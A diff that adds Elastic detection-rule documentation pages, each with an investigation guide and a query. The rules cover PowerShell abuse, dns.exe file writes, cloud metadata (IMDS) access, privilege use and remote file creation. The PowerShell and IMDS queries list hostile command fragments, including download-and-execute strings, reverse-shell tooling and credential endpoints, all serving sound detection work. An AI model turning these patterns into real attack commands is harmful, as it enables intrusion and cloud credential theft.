+*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/Octoberfest7/ThreadCPUAssignment_POC/tree/main +* https://x.com/sixtyvividtails/status/1970721197617717483 +* https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4674 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Windows Security Event Logs +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Suspicious SeIncreaseBasePriorityPrivilege Use* + + +SeIncreaseBasePriorityPrivilege allows to increase the priority of processes running on the system so that the CPU scheduler allows them to pre-empt other lower priority processes when the higher priority process has something to do. + + +*Possible investigation steps* + + +- Review the process.executable reputation and it's execution chain. +- Investiguate if the SubjectUserName is expected to perform this action. +- Correlate the event with other security alerts or logs to identify any patterns or additional suspicious activities that might suggest a broader attack campaign. +- Check the agent health status and verify if there is any tampering with endpoint security processes. + + +*False positive analysis* + + +- Administrative tasks involving legitimate CPU scheduling priority changes. + + +*Response and remediation* + + +- Immediately isolate the affected machine from the network to prevent further unauthorized access or lateral movement within the domain. +- Terminate the processes involved in the execution chain. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to ensure comprehensive remediation efforts are undertaken. + +==== Setup + + + +*Setup* + + +Ensure advanced audit policies for Windows are enabled, specifically: +Audit Sensitive Privilege Use https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4674[Event ID 4674] (An operation was attempted on a privileged object.) + +``` +Computer Configuration > +Policies > +Windows Settings > +Security Settings > +Advanced Audit Policies Configuration > +Audit Policies > +Privilege Use > +Audit Sensitive Privilege Use (Success) +``` + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:iam and event.code:"4674" and +winlog.event_data.PrivilegeList:"SeIncreaseBasePriorityPrivilege" and event.outcome:"success" and +winlog.event_data.AccessMask:"512" and not winlog.event_data.SubjectUserSid:("S-1-5-18" or "S-1-5-19" or "S-1-5-20") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Access Token Manipulation +** ID: T1134 +** Reference URL: https://attack.mitre.org/techniques/T1134/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-windows-powershell-arguments.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-windows-powershell-arguments.asciidoc new file mode 100644 index 0000000000..dc868e08e0 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-windows-powershell-arguments.asciidoc @@ -0,0 +1,210 @@ +[[prebuilt-rule-8-19-8-suspicious-windows-powershell-arguments]] +=== Suspicious Windows Powershell Arguments + +Identifies the execution of PowerShell with suspicious argument values. This behavior is often observed during malware installation leveraging PowerShell. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process-* +* logs-crowdstrike.fdr* +* logs-m365_defender.event-* +* logs-sentinel_one_cloud_funnel.* +* logs-system.security* +* logs-windows.forwarded* +* logs-windows.sysmon_operational-* +* winlogbeat-* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Windows Security Event Logs +* Data Source: Elastic Defend +* Data Source: Sysmon +* Data Source: SentinelOne +* Data Source: Microsoft Defender for Endpoint +* Data Source: Crowdstrike +* Data Source: Elastic Endgame +* Resources: Investigation Guide + +*Version*: 209 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Suspicious Windows Powershell Arguments* + + +PowerShell is a powerful scripting language and command-line shell used for task automation and configuration management in Windows environments. Adversaries exploit PowerShell's capabilities to execute malicious scripts, download payloads, and obfuscate commands. The detection rule identifies unusual PowerShell arguments indicative of such abuse, focusing on patterns like encoded commands, suspicious downloads, and obfuscation techniques, thereby flagging potential threats for further investigation. + + +*Possible investigation steps* + + +- Review the process command line and arguments to identify any encoded or obfuscated content, such as Base64 strings or unusual character sequences, which may indicate malicious intent. +- Check the parent process of the PowerShell execution, especially if it is explorer.exe or cmd.exe, to determine if the PowerShell instance was launched from a suspicious or unexpected source. +- Investigate any network activity associated with the PowerShell process, particularly looking for connections to known malicious domains or IP addresses, or the use of suspicious commands like DownloadFile or DownloadString. +- Examine the user account associated with the PowerShell execution to determine if it aligns with expected behavior or if it might be compromised. +- Correlate the event with other security alerts or logs from the same host or user to identify patterns or additional indicators of compromise. +- Assess the risk and impact of the detected activity by considering the context of the environment, such as the presence of sensitive data or critical systems that might be affected. + + +*False positive analysis* + + +- Legitimate administrative scripts may use encoded commands for obfuscation to protect sensitive data. Review the script's source and purpose to determine if it is authorized. If confirmed, add the script's hash or specific command pattern to an allowlist. +- Automated software deployment tools might use PowerShell to download and execute scripts from trusted internal sources. Verify the source and destination of the download. If legitimate, exclude the specific tool or process from the detection rule. +- System maintenance tasks often involve PowerShell scripts that manipulate files or system settings. Identify routine maintenance scripts and exclude their specific command patterns or file paths from triggering the rule. +- Security software may use PowerShell for scanning or remediation tasks, which can mimic suspicious behavior. Confirm the software's legitimacy and add its processes to an exception list to prevent false alerts. +- Developers might use PowerShell for testing or development purposes, which can include obfuscation techniques. Validate the developer's activities and exclude their specific development environments or scripts from the rule. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent further spread or communication with potential command and control servers. +- Terminate any suspicious PowerShell processes identified by the detection rule to halt ongoing malicious activities. +- Conduct a thorough scan of the affected system using updated antivirus or endpoint detection and response (EDR) tools to identify and remove any malicious payloads or scripts. +- Review and clean up any unauthorized changes to system configurations or scheduled tasks that may have been altered by the malicious PowerShell activity. +- Restore any affected files or system components from known good backups to ensure system integrity and functionality. +- Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional systems are compromised. +- Implement additional monitoring and logging for PowerShell activities across the network to enhance detection of similar threats in the future. + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.name : "powershell.exe" and + + not ( + ?user.id == "S-1-5-18" and + /* Don't apply the user.id exclusion to Sysmon for compatibility */ + not event.dataset : ("windows.sysmon_operational", "windows.sysmon") + ) and + + ( + process.command_line : ( + "*^*^*^*^*^*^*^*^*^*", + "*`*`*`*`*", + "*+*+*+*+*+*+*", + "*[char[]](*)*-join*", + "*Base64String*", + "*[*Convert]*", + "*.Compression.*", + "*-join($*", + "*.replace*", + "*MemoryStream*", + "*WriteAllBytes*", + "* -enc *", + "* -ec *", + "* /e *", + "* /enc *", + "* /ec *", + "*WebClient*", + "*DownloadFile*", + "*DownloadString*", + "* iex*", + "* iwr*", + "* aQB3AHIAIABpA*", + "*Reflection.Assembly*", + "*Assembly.GetType*", + "*$env:temp\\*start*", + "*powercat*", + "*nslookup -q=txt*", + "*$host.UI.PromptForCredential*", + "*Net.Sockets.TCPClient*", + "*curl *;Start*", + "powershell.exe \"<#*", + "*ssh -p *", + "*http*|iex*", + "*@SSL\\DavWWWRoot\\*.ps1*", + "*.lnk*.Seek(0x*", + "*[string]::join(*", + "*[Array]::Reverse($*", + "* hidden $(gc *", + "*=wscri& set*", + "*http'+'s://*", + "*.content|i''Ex*", + "*//:sptth*", + "*//:ptth*", + "*h''t''t''p*", + "*'tp'':''/'*", + "*$env:T\"E\"MP*", + "*;cmd /c $?", + "*s''t''a''r*", + "*$*=Get-Content*AppData*.SubString(*$*", + "*=cat *AppData*.substring(*);*$*", + "*-join'';*|powershell*", + "*.Content;sleep *|powershell*", + "*h\''t\''tp:\''*", + "*-e aQB3AHIAIABp*", + "*iwr *https*).Content*", + "*$env:computername*http*", + "*;InVoKe-ExpRESsIoN $COntent.CONTENt;*", + "*WebClient*example.com*", + "*=iwr $*;iex $*" + ) or + + (process.args : "-c" and process.args : "&{'*") or + + (process.args : "-Outfile" and process.args : "Start*") or + + (process.args : "-bxor" and process.args : "0x*") or + + process.args : "$*$*;set-alias" or + + ( + process.parent.name : ("explorer.exe", "cmd.exe") and + process.command_line : ("*-encodedCommand*", "*Invoke-webrequest*", "*WebClient*", "*Reflection.Assembly*")) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-unusual-file-operation-by-dns-exe.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-unusual-file-operation-by-dns-exe.asciidoc new file mode 100644 index 0000000000..ac4758647c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-unusual-file-operation-by-dns-exe.asciidoc @@ -0,0 +1,117 @@ +[[prebuilt-rule-8-19-8-unusual-file-operation-by-dns-exe]] +=== Unusual File Operation by dns.exe + +Identifies an unexpected file being modified by dns.exe, the process responsible for Windows DNS Server services, which may indicate activity related to remote code execution or other forms of exploitation. + +*Rule type*: new_terms + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.file-* +* logs-windows.sysmon_operational-* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/ +* https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/ +* https://www.elastic.co/security-labs/detection-rules-for-sigred-vulnerability + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Data Source: Elastic Endgame +* Use Case: Vulnerability +* Data Source: Elastic Defend +* Data Source: Sysmon +* Resources: Investigation Guide + +*Version*: 216 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Unusual File Operation by dns.exe* + + +The rule flags Windows DNS Server (dns.exe) creating, changing, or deleting files that aren’t typical DNS zone or log files, which signals exploitation for code execution or abuse to stage payloads for lateral movement. After gaining execution in dns.exe via DNS RPC or parsing bugs, attackers often write a malicious EXE into System32 and register a new service, leveraging the trusted service context on a domain controller to persist and pivot. + + +*Possible investigation steps* + + +- Validate the modified file’s full path, type, and provenance, prioritizing writes in %SystemRoot%\System32, NETLOGON, or SYSVOL, and confirm signature, hash reputation, and compile timestamp to rapidly classify the artifact. +- Pivot to persistence telemetry around the same timestamp by hunting for new services or scheduled tasks (e.g., SCM 7045, Security 4697, TaskScheduler 106/200) and registry autoruns that reference the file. +- Correlate with DNS service network activity and logs for unusual RPC calls, authenticated connections from non-admin hosts, or spikes in failures/crashes that could indicate exploitation. +- Inspect the service’s runtime state for injection indicators by reviewing recent module loads, unsigned DLLs, suspicious memory sections, and ETW/Sysmon events mapping threads that performed the write. +- If the file is executable or a script or placed in execution-friendly locations, detonate it in a sandbox and scope the blast radius by pivoting on its hash, filename, and path across the fleet. + + +*False positive analysis* + + +- DNS debug logging configured to write to a file with a non-.log extension (e.g., .txt) causes dns.exe to legitimately create or rotate that file during troubleshooting. +- An administrator exports a zone to a custom-named file with a nonstandard extension (e.g., .txt or .xml), leading dns.exe to create or modify that file as part of routine maintenance. + + +*Response and remediation* + + +- Isolate the host by removing it from DNS rotation and restricting network access to management-only, then capture and quarantine any files dns.exe created or modified outside %SystemRoot%\System32\Dns or with executable extensions. +- Delete or quarantine suspicious artifacts written by dns.exe (e.g., .exe, .dll, .ps1, .js) in %SystemRoot%\System32, NETLOGON, or SYSVOL, record their hashes, and block them fleetwide via EDR or application control. +- Remove persistence by disabling and deleting any new or altered Windows services, scheduled tasks, or Run/Autorun registry entries that reference the dns.exe-written file path, and restore legitimate service ImagePath values. +- Recover by repairing system files with SFC/DISM, restoring affected directories from known-good backups, and restarting the DNS service, then validate zone integrity, AD replication, and client name-resolution. +- Immediately escalate to incident response if dns.exe wrote an executable or script into NETLOGON or SYSVOL or if a service binary path was changed to point to a newly dropped file, indicating probable domain controller compromise and lateral movement. +- Harden by applying the latest Windows Server DNS patches, enforcing WDAC/AppLocker to block execution from SYSVOL/NETLOGON and restrict dns.exe writes to the DNS and log directories, and enable auditing on service creation and file writes in System32/NETLOGON/SYSVOL. + + +==== Rule query + + +[source, js] +---------------------------------- +event.category : "file" and host.os.type : "windows" and + event.type : ("creation" or "deletion" or "change") and process.name : "dns.exe" and + not file.extension : ("old" or "temp" or "bak" or "dns" or "arpa" or "log") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Exploitation of Remote Services +** ID: T1210 +** Reference URL: https://attack.mitre.org/techniques/T1210/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-unusual-instance-metadata-service-imds-api-request.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-unusual-instance-metadata-service-imds-api-request.asciidoc new file mode 100644 index 0000000000..3a2dfa71d2 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-unusual-instance-metadata-service-imds-api-request.asciidoc @@ -0,0 +1,231 @@ +[[prebuilt-rule-8-19-8-unusual-instance-metadata-service-imds-api-request]] +=== Unusual Instance Metadata Service (IMDS) API Request + +This rule identifies potentially malicious processes attempting to access the cloud service provider's instance metadata service (IMDS) API endpoint, which can be used to retrieve sensitive instance-specific information such as instance ID, public IP address, and even temporary security credentials if role's are assumed by that instance. The rule monitors for various tools and scripts like curl, wget, python, and perl that might be used to interact with the metadata API. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.network* +* logs-endpoint.events.process* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://hackingthe.cloud/aws/general-knowledge/intro_metadata_service/ +* https://www.wiz.io/blog/imds-anomaly-hunting-zero-day + +*Tags*: + +* Domain: Endpoint +* Domain: Cloud +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Discovery +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 7 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Unusual Instance Metadata Service (IMDS) API Request* + + +The Instance Metadata Service (IMDS) API provides essential instance-specific data, including configuration details and temporary credentials, to applications running on cloud instances. Adversaries exploit this by using scripts or tools to access sensitive data, potentially leading to unauthorized access. The detection rule identifies suspicious access attempts by monitoring specific processes and network activities, excluding known legitimate paths, to flag potential misuse. + + +*Possible investigation steps* + + +- Review the process details such as process.name and process.command_line to identify the tool or script used to access the IMDS API and determine if it aligns with known malicious behavior. +- Examine the process.executable and process.working_directory fields to verify if the execution path is unusual or suspicious, especially if it originates from directories like /tmp/* or /var/tmp/*. +- Check the process.parent.entity_id and process.parent.executable to understand the parent process and its legitimacy, which might provide context on how the suspicious process was initiated. +- Investigate the network event details, particularly the destination.ip field, to confirm if there was an attempted connection to the IMDS API endpoint at 169.254.169.254. +- Correlate the host.id with other security events or logs to identify any additional suspicious activities or patterns on the same host that might indicate a broader compromise. +- Assess the risk score and severity to prioritize the investigation and determine if immediate action is required to mitigate potential threats. + + +*False positive analysis* + + +- Security and monitoring tools like Rapid7, Nessus, and Amazon SSM Agent may trigger false positives due to their legitimate access to the IMDS API. Users can exclude these by adding their working directories to the exception list. +- Automated scripts or processes running from known directories such as /opt/rumble/bin or /usr/share/ec2-instance-connect may also cause false positives. Exclude these directories or specific executables from the rule to prevent unnecessary alerts. +- System maintenance or configuration scripts that access the IMDS API for legitimate purposes might be flagged. Identify these scripts and add their paths or parent executables to the exclusion list to reduce noise. +- Regular network monitoring tools that attempt connections to the IMDS IP address for health checks or status updates can be excluded by specifying their process names or executable paths in the exception criteria. + + +*Response and remediation* + + +- Immediately isolate the affected instance from the network to prevent further unauthorized access or data exfiltration. +- Terminate any suspicious processes identified in the alert that are attempting to access the IMDS API, especially those using tools like curl, wget, or python. +- Revoke any temporary credentials that may have been exposed or accessed through the IMDS API to prevent unauthorized use. +- Conduct a thorough review of the instance's security groups and IAM roles to ensure that only necessary permissions are granted and that there are no overly permissive policies. +- Escalate the incident to the security operations team for further investigation and to determine if additional instances or resources are affected. +- Implement network monitoring to detect and alert on any future attempts to access the IMDS API from unauthorized processes or locations. +- Review and update the instance's security configurations and apply any necessary patches or updates to mitigate vulnerabilities that could be exploited in similar attacks. + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.parent.entity_id with maxspan=3s +[ + process + where host.os.type == "linux" + and event.type == "start" + and event.action == "exec" + and process.parent.executable != null + + // common tooling / suspicious names (keep broad) + and ( + process.name : ( + "curl", "wget", "python*", "perl*", "php*", "ruby*", "lua*", "telnet", "pwsh", + "openssl", "nc", "ncat", "netcat", "awk", "gawk", "mawk", "nawk", "socat", "node", + "bash", "sh" + ) + or + // suspicious execution locations (dropped binaries / temp execution) + process.executable : ( + "./*", "/tmp/*", "/var/tmp/*", "/var/www/*", "/dev/shm/*", "/etc/init.d/*", "/etc/rc*.d/*", + "/etc/cron*", "/etc/update-motd.d/*", "/boot/*", "/srv/*", "/run/*", "/etc/rc.local" + ) + or + // threat-relevant IMDS / metadata endpoints (inclusion list) + process.command_line : ( + "*169.254.169.254/latest/api/token*", + "*169.254.169.254/latest/meta-data/iam/security-credentials*", + "*169.254.169.254/latest/meta-data/local-ipv4*", + "*169.254.169.254/latest/meta-data/local-hostname*", + "*169.254.169.254/latest/meta-data/public-ipv4*", + "*169.254.169.254/latest/user-data*", + "*169.254.169.254/latest/dynamic/instance-identity/document*", + "*169.254.169.254/latest/meta-data/instance-id*", + "*169.254.169.254/latest/meta-data/public-keys*", + "*computeMetadata/v1/instance/service-accounts/*/token*", + "*/metadata/identity/oauth2/token*", + "*169.254.169.254/opc/v*/instance*", + "*169.254.169.254/opc/v*/vnics*" + ) + ) + + // global working-dir / executable / parent exclusions for known benign agents + and not process.working_directory : ( + "/opt/rapid7*", + "/opt/nessus*", + "/snap/amazon-ssm-agent*", + "/var/snap/amazon-ssm-agent/*", + "/var/log/amazon/ssm/*", + "/srv/snp/docker/overlay2*", + "/opt/nessus_agent/var/nessus/*" + ) + + and not process.executable : ( + "/opt/rumble/bin/rumble-agent*", + "/opt/aws/inspector/bin/inspectorssmplugin", + "/snap/oracle-cloud-agent/*", + "/lusr/libexec/oracle-cloud-agent/*" + ) + + and not process.parent.executable : ( + "/usr/bin/setup-policy-routes", + "/usr/share/ec2-instance-connect/*", + "/var/lib/amazon/ssm/*", + "/etc/update-motd.d/30-banner", + "/usr/sbin/dhclient-script", + "/usr/local/bin/uwsgi", + "/usr/lib/skylight/al-extras", + "/usr/bin/cloud-init", + "/usr/sbin/waagent", + "/usr/bin/google_osconfig_agent", + "/usr/bin/docker", + "/usr/bin/containerd-shim", + "/usr/bin/runc" + ) + + and not process.entry_leader.executable : ( + "/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent", + "/opt/Elastic/Agent/data/elastic-agent-*/elastic-agent", + "/opt/nessus_agent/sbin/nessus-service" + ) + + // carve-out: safe /usr/bin/curl usage (suppress noisy, legitimate agent patterns) + and not ( + process.executable == "/usr/bin/curl" + and ( + // AWS IMDSv2 token PUT that includes ttl header + (process.command_line : "*-X PUT*169.254.169.254/latest/api/token*" and process.command_line : "*X-aws-ec2-metadata-token-ttl-seconds*") + or + // Any IMDSv2 GET that includes token header for any /latest/* path + process.command_line : "*-H X-aws-ec2-metadata-token:*169.254.169.254/latest/*" + or + // Common amazon tooling UA + process.command_line : "*-A amazon-ec2-net-utils/*" + or + // Azure metadata legitimate header + process.command_line : "*-H Metadata:true*169.254.169.254/metadata/*" + or + // Oracle IMDS legitimate header + process.command_line : "*-H Authorization:*Oracle*169.254.169.254/opc/*" + ) + ) +] +[ + network where host.os.type == "linux" + and event.action == "connection_attempted" + and destination.ip == "169.254.169.254" +] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Cloud Instance Metadata API +** ID: T1552.005 +** Reference URL: https://attack.mitre.org/techniques/T1552/005/ +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Cloud Infrastructure Discovery +** ID: T1580 +** Reference URL: https://attack.mitre.org/techniques/T1580/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-unusual-remote-file-creation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-unusual-remote-file-creation.asciidoc new file mode 100644 index 0000000000..2e27180b07 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-unusual-remote-file-creation.asciidoc @@ -0,0 +1,180 @@ +[[prebuilt-rule-8-19-8-unusual-remote-file-creation]] +=== Unusual Remote File Creation + +This rule leverages the new_terms rule type to detect file creation via a commonly used file transfer service while excluding typical remote file creation activity. This behavior is often linked to lateral movement, potentially indicating an attacker attempting to move within a network. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.file* +* auditbeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Unusual Remote File Creation* + + +Remote file creation tools like SCP, FTP, and SFTP are essential for transferring files across networks, often used in legitimate administrative tasks. However, adversaries can exploit these services to move laterally within a network, creating files in unauthorized locations. The detection rule identifies suspicious file creation activities by monitoring specific processes and excluding typical paths, thus highlighting potential lateral movement attempts by attackers. + + +*Possible investigation steps* + + +- Review the alert details to identify the specific process name (e.g., scp, ftp, sftp) involved in the file creation event. +- Examine the file path where the file was created to determine if it is an unusual or unauthorized location, considering the exclusion of typical paths like /dev/ptmx, /run/*, or /var/run/*. +- Check the user account associated with the process to verify if it is a legitimate user or if there are signs of compromised credentials. +- Investigate the source and destination IP addresses involved in the file transfer to identify any suspicious or unexpected network connections. +- Analyze recent activity on the host to identify any other unusual or unauthorized actions that may indicate lateral movement or further compromise. +- Correlate this event with other alerts or logs to determine if it is part of a broader attack pattern or campaign within the network. + + +*False positive analysis* + + +- Administrative file transfers: Legitimate administrative tasks often involve transferring files using SCP, FTP, or SFTP. To manage this, create exceptions for known administrative accounts or specific IP addresses that regularly perform these tasks. +- Automated backup processes: Scheduled backups may use tools like rsync or sftp-server to create files remotely. Identify and exclude these processes by specifying the paths or scripts involved in the backup operations. +- System updates and patches: Some system updates might involve remote file creation in non-standard directories. Monitor update schedules and exclude these activities by correlating them with known update events. +- Development and testing environments: Developers may use remote file transfer services to deploy or test applications. Establish a baseline of typical development activities and exclude these from alerts by defining specific user accounts or project directories. +- Third-party integrations: Some third-party applications might require remote file creation as part of their functionality. Document these integrations and exclude their associated processes or file paths from triggering alerts. + + +*Response and remediation* + + +- Isolate the affected host immediately to prevent further lateral movement within the network. This can be done by removing the host from the network or applying network segmentation controls. +- Terminate any suspicious processes identified in the alert, such as scp, ftp, sftp, vsftpd, sftp-server, or sync, to stop unauthorized file transfers. +- Conduct a thorough review of the file paths and files created to determine if any sensitive data has been compromised or if any malicious files have been introduced. +- Restore any unauthorized or malicious file changes from known good backups to ensure system integrity. +- Update and patch the affected systems to close any vulnerabilities that may have been exploited by the attacker. +- Implement stricter access controls and authentication mechanisms for remote file transfer services to prevent unauthorized use. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems have been compromised. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from one of the following integrations: +- Elastic Defend +- Auditbeat + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +*Auditbeat Setup* + +Auditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations. + + +*The following steps should be executed in order to add the Auditbeat on a Linux System:* + +- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages. +- To install the APT and YUM repositories follow the setup instructions in this https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html[helper guide]. +- To run Auditbeat on Docker follow the setup instructions in the https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html[helper guide]. +- To run Auditbeat on Kubernetes follow the setup instructions in the https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html[helper guide]. +- For complete “Setup and Run Auditbeat” information refer to the https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:file and host.os.type:linux and event.action:creation and +process.name:(scp or ftp or sftp or vsftpd or sftp-server or sync) and +not ( + file.path:( + /dev/ptmx or /run/* or /var/run/* or /home/*/.ansible/*AnsiballZ_*.py or /home/*/.ansible/tmp/ansible-tmp* or + /root/.ansible/*AnsiballZ_*.py or /tmp/ansible-chief/ansible-tmp*AnsiballZ_*.py or + /tmp/newroot/home/*/.ansible/tmp/ansible-tmp*AnsiballZ_*.py or /tmp/.ansible/tmp/ansible-tmp*AnsiballZ_*.py or + /tmp/ansible-tmp-*/AnsiballZ_*.py or /tmp/.ansible/ansible-tmp-*AnsiballZ_*.py + ) or + file.extension:(filepart or yaml or new or rpm or deb) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SSH +** ID: T1021.004 +** Reference URL: 